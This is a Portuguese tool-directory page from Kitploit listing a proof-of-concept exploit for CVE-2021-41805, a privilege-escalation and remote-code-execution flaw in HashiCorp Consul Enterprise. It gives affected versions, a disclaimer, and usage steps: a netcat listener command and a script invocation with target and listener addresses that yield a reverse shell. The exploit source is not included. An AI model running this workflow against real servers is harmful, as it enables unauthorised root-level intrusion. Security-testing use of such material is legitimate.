Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2021-41805 — Uma prova de conceito para CVE-2021-41805, que é uma vulnerabilidade no HashiCorp Consul Enterprise que permite Execução Remota de Código (RCE) com privilégios elevados. | Kitploit
Ferramentas/GitHubGitHub/acfirthh/cve-2021-41805
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoSegurança na NuvemAprendizado e EducaçãoFerramenta de Acesso Remoto
GitHubacfirthh/cve-2021-41805

CVE-2021-41805

Uma prova de conceito para CVE-2021-41805, que é uma vulnerabilidade no HashiCorp Consul Enterprise que permite Execução Remota de Código (RCE) com privilégios elevados.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-41805 - HashiCorp Consul Enterprise RCE

[!WARNING] AVISO LEGAL: Esta ferramenta é estritamente para fins educacionais APENAS! O uso desta ferramenta para atacar alvos sem consentimento prévio mútuo é ILEGAL. É responsabilidade do usuário obedecer a todas as leis aplicáveis ao usar esta ferramenta. O desenvolvedor desta ferramenta não assume nenhuma responsabilidade e não é responsável por qualquer uso indevido ou dano causado por este programa.

Sobre o CVE

Um token ACL (com as permissões padrão operator:write) em um namespace pode ser usado para elevação não intencional de privilégios em um namespace diferente. Isso pode ser abusado para obter Execução Remota de Código (RCE) com privilégios elevados.

Versões Afetadas

  • < 1.8.17
  • 1.9.x < 1.9.11
  • 1.10.x < 1.10.4

Instalação e Execução do Script

  • Primeiro, clone o repositório:
    git clone https://github.com/acfirthh/CVE-2021-41805.git
  • Mude o diretório para o repositório clonado:
    cd CVE-2021-41805
  • Inicie um listener simples:
    nc -nvlp <PORTA_LISTENER>
  • Execute o script:
    python3 CVE-2021-41805.py -r <IP_ALVO> -rp <PORTA_ALVO> -l <IP_LISTENER> -lp <PORTA_LISTENER> [OPCIONAL: -t <token ACL> -v (verbose) -s (usar SSL)]

Reverse Shell

Saída Esperada

Executar o exploit com os argumentos básicos: -r [IP_ALVO], -rp [PORTA_ALVO], -l [IP_LISTENER], -lp [PORTA_LISTENER] (-t [TOKEN_ACL], -s [Usar SSL]) fornecerá uma saída básica como:

root@kitploit:~
[*] A requisição PUT foi feita com sucesso. Verifique seu listener...

Executar o exploit com os argumentos básicos mais -v [VERBOSE] fornecerá uma saída detalhada:
Saída Detalhada

Se ocorrer um erro ao executar o exploit e o argumento -v for especificado, a saída será algo como:
Saída Detalhada com Erro

Baixar ferramenta